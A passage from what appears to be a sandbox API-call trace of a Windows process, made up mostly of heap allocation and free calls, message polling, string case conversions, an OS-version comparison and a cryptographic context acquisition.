lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0266.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0266.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.645] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0266.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.646] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0266.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.647] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.647] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0266.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0266.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0266.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0266.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0266.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0266.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0266.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0266.649] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0266.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0266.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0266.650] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0266.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0266.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0266.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0266.650] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.651] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0266.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.652] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0266.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0266.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0266.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.653] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.654] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0266.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.658] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.658] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0266.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0266.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0266.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0266.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.660] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0266.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0266.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.661] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.661] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.661] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.661] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.662] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.662] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0266.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0266.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0266.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0266.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0266.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0266.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0266.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0266.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0266.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0266.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0266.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0266.668] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0266.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0266.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0266.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.669] RtlAllocateHeap (HeapHandle=0x25c0000, 